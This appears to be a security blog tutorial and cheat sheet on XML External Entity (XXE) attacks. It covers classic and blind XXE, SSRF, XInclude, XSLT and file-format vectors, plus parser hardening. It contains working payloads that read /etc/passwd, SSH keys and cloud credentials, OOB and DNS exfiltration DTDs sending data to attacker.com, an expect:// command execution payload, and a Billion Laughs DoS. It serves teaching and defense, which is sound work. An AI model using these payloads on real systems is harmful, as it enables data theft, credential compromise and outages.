On this page

April 19, 2026apsyleg1 min read

#xxe #xml #dtd #blind-xxe #ssrf #web-security

XML External Entity (XXE)

1. What Is XXE

XXE is a vulnerability where an XML parser resolves external entities, letting an attacker read files, make server-side requests, and (sometimes) execute code.

Attacker → XML with malicious DTD → Parser → Resolves entity
                                                ↓
                                    file:///etc/passwd
                                    http://169.254.169.254/...
                                    http://internal-service/...

The key point: the parser itself fetches data from the URI in SYSTEM — the attacker just tells it where to go.

This isn't a bug in application code — it's the design of the XML specification from 1998, which most parsers support by default. External entity support was a feature, not a bug. The problem is that "any URI" includes file://, http://, ftp://, and sometimes expect://.

2. Fundamentals: XML, DTD, Entities

XML Entity

An entity is a variable in XML. It's declared in the DTD and used in the document or within the DTD itself.

Two Ways to Classify Entities

By value source:

Type	Value	Example
Internal	Defined directly in DTD	`<!ENTITY name "John">`
External	Loaded from a file/URL	`<!ENTITY name SYSTEM "file:///etc/passwd">`

By usage location:

Type	Syntax	Where it works	Used for
General entity	`&name;`	In the XML document body	Classic XXE
Parameter entity	`%name;`	Only inside the DTD	Blind XXE (OOB)

<!-- General entity — in the document body -->
<!ENTITY xxe SYSTEM "file:///etc/passwd">
<foo>&xxe;</foo>

<!-- Parameter entity — inside the DTD -->
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY send SYSTEM 'http://attacker.com/?d=%file;'>">
%eval;

Why parameter entities matter: in blind XXE you need to build the payload inside the DTD — read a file and embed its contents into a URL. General entities can't do that — they only work in the body. Parameter entities let you substitute values directly within the DTD, building dynamic constructs.

Parameter Entity Restriction in the Internal DTD Subset

Per the XML spec, you cannot define a parameter entity and use it to create new entities within the same internal DTD subset. This means a construct like <!ENTITY % a "..."> <!ENTITY % b "<!ENTITY % c SYSTEM '...'> %a;"> %b; inside <!DOCTYPE foo [ ... ]> won't work — the parser rejects it.

This is exactly why blind XXE requires an external DTD — parameter entities only work fully in an external DTD. It explains why blind XXE always loads evil.dtd from the attacker's server: only inside a loaded DTD file does the parser allow free combination of parameter entities, enabling substitution chains.

Exception — the trick with redefining an entity from a local system DTD (described in section 4, Error-based via entity redefinition). In this case you load a legitimate DTD file from the server itself and redefine one of its entities with your payload.

DTD (Document Type Definition)

DTD is a set of rules describing XML structure. Entities are declared in the DTD.

No DTD = no entity declarations = no XXE.

Where the DTD can live:

<!-- 1. Internal DTD — inside the document itself (between [ and ]) -->
<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

<!-- 2. External DTD — loaded from a URL -->
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd">
<foo>&xxe;</foo>

<!-- 3. Combined — internal + external -->
<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://attacker.com/evil.dtd" [
  <!ENTITY % local "value">
]>

3. Where to Look for XXE

Obvious Entry Points

API endpoints with Content-Type: application/xml or text/xml
SOAP services (the entire protocol is XML-based)
XML file uploads (configs, feeds, data)
RSS/Atom import

Less Obvious Entry Points

SVG uploads — SVG is XML
DOCX/XLSX/PPTX uploads — ZIP archives with XML inside
GPX uploads — geodata in XML
XHTML — HTML in XML format
SAML — XML-based authentication
PDF generation from XML/XSLT
Configuration files — .xml, .plist, .svg

Content-Type Swap (JSON → XML)

If the application accepts JSON, try switching the format:

# Before:
POST /api/user HTTP/1.1
Content-Type: application/json

{"name": "test", "email": "test@test.com"}

# After:
POST /api/user HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
  <name>&xxe;</name>
  <email>test@test.com</email>
</user>

Why this works: frameworks (Spring, ASP.NET, Rails) often pick the parser automatically based on Content-Type. If the XML parser is enabled and not hardened — XXE.

Also check: text/xml, application/xhtml+xml, image/svg+xml.

4. XXE Types

The parser response is displayed — file contents are visible in the response.

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

Server response:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

The parser response is not displayed. Three approaches:

OOB (Out-of-Band) — Sending Data Out

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<foo>&send;</foo>

evil.dtd on the attacker's server:

<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/?d=%file;'>">
%all;

The chain:

Parser reads /etc/hostname → into %file
Loads evil.dtd → into %dtd
%all assembles a new entity send with data in the URL
&send; triggers an HTTP request to attacker.com carrying the data

Tools for receiving: Burp Collaborator, interactsh, your own server with python3 -m http.server.

Error-based — Data in the Error Message

Useful when a firewall blocks outbound connections (OOB doesn't work).

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % dtd SYSTEM "http://attacker.com/error.dtd">
  %dtd;
]>
<foo>&trigger;</foo>

error.dtd:

<!ENTITY % all "<!ENTITY trigger SYSTEM 'file:///nonexistent/%file;'>">
%all;

The parser tries to open file:///nonexistent/web-server-01 → error:

java.io.FileNotFoundException: /nonexistent/web-server-01

→ File contents in the error text.

Error-based via Entity Redefinition (No Outbound Connections)

If you can't even load evil.dtd, but there's a local DTD on the server:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
  <!ENTITY % ISOamso '
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">
    &#x25;eval;
    &#x25;error;
  '>
  %local_dtd;
]>
<foo>bar</foo>

You redefine an entity from the local DTD, injecting your payload. This is the only exploitation method when outbound connections are fully blocked — no external DTD needed, everything happens locally.

4.3 XXE → SSRF

XXE is a full-fledged vector for SSRF:

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<foo>&xxe;</foo>

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://internal-service:8080/admin">
]>
<foo>&xxe;</foo>

All SSRF techniques apply: cloud metadata, port scanning, accessing internal services.

4.4 XXE → DoS (Billion Laughs)

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!-- ... -->
]>
<foo>&lol9;</foo>

9 levels of nesting = 10^9 copies of the string "lol" — gigabytes in parser memory. Exponential expansion = the parser eats all available memory.

Doesn't leak data, but useful for:

Confirming DTD processing — if Billion Laughs works, the parser processes entities, so you can try XXE
DoS attacks — taking the service down

5. XInclude

When It Applies

You don't control the entire XML document — only a piece of data that gets inserted into XML on the server. You can't declare a DOCTYPE (it must be at the beginning of the document).

Example: your input (username, comment) gets embedded into an XML template on the backend.

Payload

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</foo>

xmlns:xi — namespace declaration for XInclude
parse="text" — read as text (without this the parser expects valid XML)
No DOCTYPE needed
Only works if the parser supports XInclude (libxml2, Xerces, most Java parsers)

Hands-on exercise: XInclude Attack (PortSwigger).

6. XXE via File Formats

SVG

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<svg xmlns="http://www.w3.org/2000/svg" width="200" height="200">
  <text x="0" y="20">&xxe;</text>
</svg>

Upload as an avatar/image → if the server parses SVG (e.g., converts to PNG) → XXE.

DOCX / XLSX

Create a normal .docx file
Unzip it (it's a ZIP): unzip document.docx -d doc_extracted
Edit doc_extracted/word/document.xml — insert DTD with payload
Re-zip: cd doc_extracted && zip -r ../evil.docx .
Upload to the server

Files inside DOCX where you can insert the payload:

word/document.xml
[Content_Types].xml
_rels/.rels

7. The Bad Character Problem and Bypasses

The Problem

When the parser substitutes file contents, it tries to parse them as XML. If the file contains <, &, ]]> — the parser breaks.

file:///etc/passwd             ✅  — no special characters
file:///var/www/config.php     ❌  — full of < and &
file:///etc/fstab              ❌  — may contain &

Bypass 1: PHP Filter (If the Server Runs PHP)

<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/config.php">

The file arrives in base64 — no special characters. Decode on your end.

Bypass 2: CDATA Wrapper via Parameter Entities

evil.dtd:

<!ENTITY % file SYSTEM "file:///var/www/html/config.php">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY wrapped '%start;%file;%end;'>">
%all;

Main XML:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<foo>&wrapped;</foo>

File contents get wrapped in CDATA → the parser doesn't interpret special characters.

Bypass 3: jar:// Protocol (Java)

jar:http://attacker.com/evil.jar!/file.txt

Java-specific — downloads the archive, extracts it, reads the file inside. Can be used to bypass protocol restrictions.

8. Exploitation: What to Read

System Files

Linux:

file:///etc/passwd
file:///etc/shadow              — password hashes (needs root)
file:///etc/hostname
file:///proc/self/environ       — environment variables (secrets, keys)
file:///proc/self/cmdline       — process arguments
file:///home/user/.ssh/id_rsa   — private SSH key
file:///home/user/.bash_history — command history

Windows:

file:///C:/Windows/win.ini
file:///C:/Windows/System32/drivers/etc/hosts
file:///C:/Users/Administrator/.ssh/id_rsa
file:///C:/inetpub/wwwroot/web.config

Application Configs

file:///var/www/html/config.php
file:///var/www/html/.env
file:///var/www/html/wp-config.php
file:///opt/app/application.properties     — Spring Boot
file:///opt/app/application.yml
file:///etc/nginx/nginx.conf
file:///etc/apache2/sites-enabled/000-default.conf

Cloud Metadata (XXE → SSRF)

http://169.254.169.254/latest/meta-data/iam/security-credentials/  — AWS
http://metadata.google.internal/computeMetadata/v1/                — GCP
http://169.254.169.254/metadata/instance                           — Azure

More on SSRF: SSRF (Server-Side Request Forgery).

9. XXE via XSLT

If the server performs XSLT transformations, the document() function in XSLT can be used to read files and make HTTP requests — similar to XXE, but through a different mechanism. This is a separate attack surface, unrelated to DTD and entities.

File Read via XSLT

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
  <xsl:template match="/">
    <xsl:copy-of select="document('file:///etc/passwd')"/>
  </xsl:template>
</xsl:stylesheet>

SSRF via XSLT

<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
  <xsl:template match="/">
    <xsl:copy-of select="document('http://169.254.169.254/latest/meta-data/')"/>
  </xsl:template>
</xsl:stylesheet>

Why This Works

XSLT processors (Xalan, Saxon, libxslt) allow document() by default. The function is meant for loading additional XML documents during transformation, but it supports arbitrary URIs — including file:// and http://.

Important: even if the application has fully disabled DTD and external entities in the XML parser, XSLT transformation can still be vulnerable. These are two different mechanisms, and defending against one doesn't protect against the other.

10. Chaining with Other Vulnerabilities

XXE rarely exists in a vacuum — exploitation often builds on chains with other vulnerabilities:

Chain	How it works	Impact
XXE → SSRF	External entity with `http://` URI	Cloud metadata, internal services
XXE → LFI	Reading source code → finding new vulnerabilities	Secret disclosure, further escalation
Blind XXE + DNS	DNS exfiltration works even through strict HTTP firewalls	Confirming the vulnerability, slow exfiltration
XXE → RCE	`expect://` (PHP), `jar://` chains, XSLT code execution	Full server control
SSRF → XXE	SSRF to an internal service that parses XML	Reading local files on the internal server

XXE → RCE (PHP + expect)

The expect:// URI scheme in PHP executes shell commands:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "expect://id">
]>
<foo>&xxe;</foo>

If the server returns uid=33(www-data)... — that's RCE. Requirements: PHP + the expect extension loaded. Rare in production, common in CTFs.

DNS Exfiltration

When outbound HTTP is fully blocked, DNS queries often get through:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY send SYSTEM 'http://%file;.attacker.com/'>">
%eval;

Data arrives as a subdomain in the DNS query — track it via Burp Collaborator or interactsh.

More on SSRF: SSRF (Server-Side Request Forgery).

11. Testing Methodology

Step 1: Discover Entry Points

Find all endpoints that accept XML (Content-Type, SOAP, files)
Check file uploads: SVG, DOCX, XLSX, XML
Try swapping Content-Type from JSON to XML
Check SAML endpoints

Step 2: Test DTD Processing

Send a harmless payload — if the parser processes DTD, XXE is possible:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe "testvalue">
]>
<foo>&xxe;</foo>

If the response contains testvalue → DTD is processed → try an external entity.

Step 3: Determine the Type

Situation	Type	Approach
Parser response is visible	Classic	`SYSTEM "file:///etc/passwd"`
Response not visible, outbound allowed	Blind OOB	Parameter entities + external DTD
Response not visible, outbound blocked	Blind Error-based	Error with data or local DTD
You don't control DOCTYPE	XInclude	`xi:include`

Step 4: Exploitation

1. file:///etc/passwd              → confirm file read
2. file:///proc/self/environ       → secrets from env
3. file:///home/user/.ssh/id_rsa   → SSH keys
4. http://169.254.169.254/...      → cloud credentials
5. http://internal:PORT/...        → SSRF to internal services
6. php://filter/...                → read PHP code (base64)

Step 5: If It Doesn't Work

Try other protocols: file://, http://, php://, jar://
Try parameter entities instead of general
Try XInclude
Try the error-based approach
Try via files (SVG, DOCX)
Check other Content-Type values
Try UTF-16 encoding (some filters only check for DOCTYPE in ASCII)
Split the payload across multiple entity definitions

12. XXE Defense

The Right Approach — Disable DTD / External Entities

Java (DocumentBuilderFactory) — most reliable:

// Disallow DOCTYPE entirely
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

Java (SAXParserFactory):

factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

Python (lxml):

parser = etree.XMLParser(resolve_entities=False, no_network=True)

PHP:

libxml_disable_entity_loader(true);  // PHP < 8.0
// In PHP 8.0+ external entities are disabled by default

C# (.NET):

XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;

Ruby (Nokogiri):

Nokogiri::XML(xml) { |config| config.nonet }

The LIBXML_NOENT Trap in PHP

// VULNERABLE — ENABLES entity substitution:
$doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);

// SAFE — without the flag:
$doc = simplexml_load_string($xml);

LIBXML_NOENT = "substitute entity values into text" → the parser resolves external entities → XXE.

The name is misleading: "NO ENT" looks like "no entities", but it actually means "no entities in the output" (replace them with their values).

Parser Defaults by Language and Version

Language / Library	Safe by default?	Since version	Note
Java `DocumentBuilderFactory`	No	—	Requires explicit configuration even in Java 17+
Java `SAXParserFactory`	No	—	Same
PHP `simplexml_load_string`	Yes	PHP 8.0+	PHP <8 needs `libxml_disable_entity_loader(true)`
PHP + `LIBXML_NOENT`	NO!	—	The flag enables entity substitution (trap)
Python `lxml`	Yes	4.6+	`resolve_entities=False, no_network=True` by default
Python `defusedxml`	Yes	always	Purpose-built for safe parsing
Python `xml.etree.ElementTree`	Partially	—	Doesn't support external entities, but vulnerable to Billion Laughs
.NET `XmlReader`	Yes	.NET Core	In .NET Framework depends on version
Ruby `Nokogiri`	Yes	1.13+	`NONET` by default
libxml2	Yes	2.9+	But `LIBXML_NOENT` breaks the protection

General Principles

Disable DTD entirely — don't try to filter individual entities
Don't trust defaults — in many languages external entities are enabled by default
Validate Content-Type — don't accept XML if you're not expecting it
Parse files safely — SVG, DOCX, XLSX should be parsed with entities disabled
Don't filter input data — filters get bypassed (UTF-16, parametric entities)
Don't use XML where JSON would work
Check parsers for all formats that can contain XML: SVG, DOCX, XLSX, SAML
Track specific versions of libraries and their defaults — don't rely on "probably safe"

13. Severity Assessment

Severity	Conditions
Critical	Reading arbitrary files with secrets, cloud credentials via SSRF, RCE via chain
High	Reading system files (`/etc/passwd`, configs), SSRF to internal network
Medium	Blind XXE with limited exfiltration, SSRF only to specific hosts
Low	DoS only (Billion Laughs), DTD is processed but external entities are blocked

14. Tools

Tool	Purpose
Burp Suite	Intercepting requests, swapping Content-Type, testing payloads
Burp Collaborator / interactsh	Confirming blind XXE (OOB callback)
XXEinjector	Automating XXE exploitation (OOB, error-based)
oxml_xxe	Generating DOCX/XLSX/PPTX with XXE payloads
docem	Embedding XXE into DOCX/XLSX/ODT
python3 -m http.server	Quick server for receiving OOB and serving evil.dtd

15. Notable Cases

Facebook (2014, Bug Bounty): Blind XXE via DOCX upload on the careers portal → reading /etc/passwd. Bounty $30,000+.

Uber (2016, Bug Bounty): XXE in the SAML parser → reading arbitrary files from the server.

Google (2014, Bug Bounty): XXE via XLSX upload in the Google Toolbar button gallery.

PortSwigger Research: XXE via SVG in avatar uploads — a common pattern in real-world applications.

16. Q&A — Prep Questions

1. What is XXE?

A vulnerability in XML parsers where the parser resolves external entities defined in the DTD. The attacker specifies a URI via SYSTEM — the parser automatically fetches the file or URL contents and substitutes them into the document. This isn't a bug in application code — it's the design of the XML specification from 1998, which most parsers support by default.

2. What's the key prerequisite for XXE?

The parser must process DTD (Document Type Definition) and support external entities. No DTD means no entity declarations means no XXE. If DOCTYPE is prohibited at the parser level — the attack is impossible (except for XInclude, which works without DTD).

3. What's the typical impact of XXE?

Reading arbitrary files (file:///etc/passwd, configs, SSH keys, .env), SSRF to internal services and cloud metadata (IAM keys), DoS via Billion Laughs. In rare cases — RCE via expect:// (PHP) or a deserialization chain. Blind XXE adds OOB exfiltration and error-based data leaks.

4. How does XXE differ from regular XML injection?

XML injection is about manipulating the structure of an XML document (inserting tags, changing values). XXE exploits the parser's own capabilities through DTD and entities. XXE doesn't change XML logic — it makes the parser load external resources. These are different levels of attack: injection works with data, XXE works with the parsing mechanism.

A situation where the parser resolves external entities, but the result isn't displayed in the response. Exploitation goes through three channels: OOB (out-of-band) — sending data via HTTP/DNS request to the attacker's server using parameter entities and an external DTD; error-based — triggering an error whose text contains the data; redefining an entity from a local system DTD when outbound connections are blocked.

6. How does XXE turn into SSRF?

Replace file:// with http:// in the SYSTEM URI. The parser makes an HTTP request to the specified address — including internal addresses (169.254.169.254 for cloud metadata, localhost:PORT for internal services). XXE is one of the simplest vectors for SSRF, because the parser makes the request automatically.

7. Why is "we blocked DOCTYPE" not always the end of the story?

XInclude doesn't require DOCTYPE — it works through an XML namespace and can be injected even when the attacker only controls part of the XML document. XSLT transformations use document() to load external resources — a separate vector, unrelated to DTD. SVG, DOCX, XLSX are XML formats that may be processed by other parsers with different settings.

8. Why is it dangerous to rely on "our parser is safe by default"?

Java DocumentBuilderFactory is vulnerable by default even in Java 17+. PHP with the LIBXML_NOENT flag enables entity substitution (the name is misleading). Python xml.etree.ElementTree doesn't support external entities but is vulnerable to Billion Laughs. Every parser requires checking the specific version and configuration — there's no universal "safe by default".

9. What is Billion Laughs and why is it discussed alongside XXE?

An attack based on nested entities where each level references the previous one 10 times — exponential expansion. 9 levels of nesting = 10^9 copies of the string "lol" — gigabytes in parser memory. Doesn't leak data, but confirms DTD processing (if Billion Laughs works — the parser processes entities, you can try XXE). Some parsers are protected against external entities but vulnerable to Billion Laughs.

10. What does proper XXE defense look like?

Disable DTD entirely at the parser level (disallow-doctype-decl in Java, DtdProcessing.Prohibit in .NET). Don't filter input data — filters get bypassed (UTF-16, parametric entities). Don't use XML where JSON would work. Check parsers for all formats that can contain XML: SVG, DOCX, XLSX, SAML. Track specific library versions and their defaults — don't rely on "probably safe".

17. Quick Reference Cheatsheet

XXE = parser resolves external entities from DTD

Entities:
  internal/external — where the value comes from
  general (&name;) / parameter (%name;) — where it's used
  Parameter entities → for blind XXE (work inside DTD)
  Parameter entities in internal DTD subset are restricted →
    need external DTD (or the local DTD trick)

Where: XML API, SOAP, SVG, DOCX/XLSX, Content-Type swap JSON→XML,
       SAML, GPX, XHTML, PDF generation from XSLT

Types:
  Classic     → response visible, SYSTEM "file:///..."
  Blind OOB   → parameter entities + evil.dtd → HTTP callback
  Error-based → data in the error message (when OOB is blocked)
  Local DTD   → entity redefinition from system DTD (no outbound)
  XInclude    → no control over DOCTYPE
  XSLT        → document() for file read and HTTP (no DTD)

Payload (basic):
  <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
  <foo>&xxe;</foo>

Bad characters (< &):
  PHP → php://filter/convert.base64-encode/resource=...
  General → CDATA wrapper via parameter entities
  Java → jar:// to bypass restrictions

Chains:
  XXE→SSRF, XXE→LFI, XXE→RCE (expect://),
  Blind XXE+DNS, SSRF→XXE

Targets: /etc/passwd, .env, SSH keys, cloud metadata, internal APIs

Defense:
  Disable DTD entirely (disallow-doctype-decl)
  LIBXML_NOENT → ENABLES substitution (trap!)
  Java is vulnerable by default even in 17+
  Python xml.etree — no external entities, but has Billion Laughs
  Don't filter — disable. Not XML — JSON.

Severity: files with secrets / cloud keys = critical,
          /etc/passwd = high, blind = medium, DoS = low

XML External Entity (XXE)

1. What Is XXE#

2. Fundamentals: XML, DTD, Entities#

XML Entity#

Two Ways to Classify Entities#

Parameter Entity Restriction in the Internal DTD Subset#

DTD (Document Type Definition)#

3. Where to Look for XXE#

Obvious Entry Points#

Less Obvious Entry Points#

Content-Type Swap (JSON → XML)#

4. XXE Types#

4.1 Classic (Non-blind) XXE#

4.2 Blind XXE#

OOB (Out-of-Band) — Sending Data Out

Error-based — Data in the Error Message

Error-based via Entity Redefinition (No Outbound Connections)

4.3 XXE → SSRF#

4.4 XXE → DoS (Billion Laughs)#

5. XInclude#

When It Applies#

Payload#

6. XXE via File Formats#

SVG#

DOCX / XLSX#

7. The Bad Character Problem and Bypasses#

The Problem#

Bypass 1: PHP Filter (If the Server Runs PHP)#

Bypass 2: CDATA Wrapper via Parameter Entities#

Bypass 3: jar:// Protocol (Java)#

8. Exploitation: What to Read#

System Files#

Application Configs#

Cloud Metadata (XXE → SSRF)#

9. XXE via XSLT#

File Read via XSLT#

SSRF via XSLT#

Why This Works#

10. Chaining with Other Vulnerabilities#

XXE → RCE (PHP + expect)#

DNS Exfiltration#

11. Testing Methodology#

Step 1: Discover Entry Points#

Step 2: Test DTD Processing#

Step 3: Determine the Type#

Step 4: Exploitation#

Step 5: If It Doesn't Work#

12. XXE Defense#

The Right Approach — Disable DTD / External Entities#

The LIBXML_NOENT Trap in PHP#

Parser Defaults by Language and Version#

General Principles#

13. Severity Assessment#

14. Tools#

15. Notable Cases#

16. Q&A — Prep Questions#

1. What is XXE?#

2. What's the key prerequisite for XXE?#

3. What's the typical impact of XXE?#

4. How does XXE differ from regular XML injection?#

5. What is blind XXE?#

6. How does XXE turn into SSRF?#

7. Why is "we blocked DOCTYPE" not always the end of the story?#

8. Why is it dangerous to rely on "our parser is safe by default"?#

9. What is Billion Laughs and why is it discussed alongside XXE?#

10. What does proper XXE defense look like?#

17. Quick Reference Cheatsheet#

More in this category

Web Shell Upload via Extension Blacklist Bypass (PortSwigger Lab)

Web Shell Upload via Obfuscated File Extension (PortSwigger Lab)

Remote Code Execution via Web Shell Upload (PortSwigger Lab)